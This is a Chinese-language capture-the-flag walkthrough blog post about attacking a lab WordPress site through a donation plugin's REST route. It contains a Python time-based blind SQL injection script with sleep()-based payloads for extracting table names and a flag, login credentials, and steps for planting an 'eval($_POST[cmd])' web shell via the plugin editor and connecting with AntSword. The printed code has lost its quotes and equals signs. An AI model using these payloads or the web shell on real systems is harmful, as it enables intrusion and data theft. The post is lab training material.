1.阅读靶场介绍这里我们可以看到的就是由于插件引发的漏洞具体思路就是编写脚本插件然后改为木马并且启用最后完成中国蚁剑板块的websehll带着这个思路我们开启征程吧2.启动靶场我们会得到如下页面这里博主也有做额外的页面测试没有得到一个有效的结果这里我们直接拼接/admin去找到后台相信很多彦祖和亦非们曾今都会卡在这里无论是弱口令/空口令/还是暴力破解都得不到有效的账号/密码去进入后台这里博主是跑一个脚本去登入到后台的各位可以参考参考import requests import time def time_delay(url, headers, payload): start_time time.time() response requests.post(url, headersheaders, datapayload) end_time time.time() #print(end_time,start_time) delay end_time - start_time return delay def time_based_blind_sql_injection(url, headers): result[] for i in range(1, 100): for j in range(32,126):#r0123456789abcdefghijklmnopqrstuvwxyz_-{}: #find db #payload {id: (if((substr(database(),%d,1))%s,sleep(10),1))#} % (i, j) #find table #payload {id: (if(ascii(substr((select table_name from information_schema.tables where table_schemadatabase() limit 0,1),%d,1))%d,sleep(10),1))#} % (i, j) #find table -wp% payload {id: (if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemadatabase() and table_name not like 0x777025),%d,1))%d,sleep(10),1))#} % (i, j) #find column #payload {id: (if(ascii(substr((select count(column_name) from information_schema.columns where table_nameflag),%d,1))%d,sleep(10),1))#} % (i, j) payload {id: (if(ascii(substr((select flag from ctf.flag),%d,1))%d,sleep(10),1))#} % (i, j) delay time_delay(url, headers, payload) print({ ,.join(result), } -,i,-,j,time_delay:,delay) if delay 9: result.append(chr(j)) print(.join(result)) break else: print(The payload is not vulnerable to SQL injection.) print(result:,.join(result)) if __name__ __main__: url https://eci-2zecxtkbjkqos2volkuy.cloudeci1.ichunqiu.com/index.php?rest_route/xs-donate-form/payment-redirect/3 headers { Cache-Control: max-age0, Upgrade-Insecure-Requests: 1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36, Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,/;q0.8,application/signed-exchange;vb3;q0.7, Accept-Encoding: gzip, deflate, Accept-Language: zh-CN,zh;q0.9, Cookie: _gaGA1.2.617032228.1689668529; _ga_J1DQF09WZCGS1.2.1689668531.1.0.1689668531.0.0.0, Connection: close, Content-Type: application/json, } time_based_blind_sql_injection(url, headers)使用idlepython编辑器放上面的代码然后用法如下winr然后cmd这里的文件路径和url都是不一致的各位需要对应修改出现如下结果证明是成功的然后我们跑回来登入界面这里就可以用这个账号/密码:daviddomainexample.com/Admin123去登入后台这里我们需要点击更新哟然后我们会进入一个这样的界面如果卡在上面那个界面进不去的小伙伴们这里要保持一直用https这个协议哟下一步我们找到插件然后点击插件编辑器如下图所示这里我们点击我明白接下里我们在右边那个地方选择这个选项然后在左边的代码去输入如下代码eval($_POST[cmd]);然后这里需要点击更新文件完成以后它会显示然后我们回到已安装插件找到你好多莉点击启用3.webshell环节启动中国蚁剑其中url路径为https://eci-2ze9foj8a8eqorl8isl6.cloudeci1.ichunqiu.com/wp-admin/plugin-editor.php?filehello.php进去以后我们就可以很顺利的找到flag这个大宝贝了到此相信聪明的亦非彦祖们又攻克一个靶场了感谢你们宝贵的时间创作不易喜欢博主的各位帅哥美女们期待你们的一键三连有不懂欢迎留言博主会一一解答哟期待博主攻克任何靶场的也欢迎留言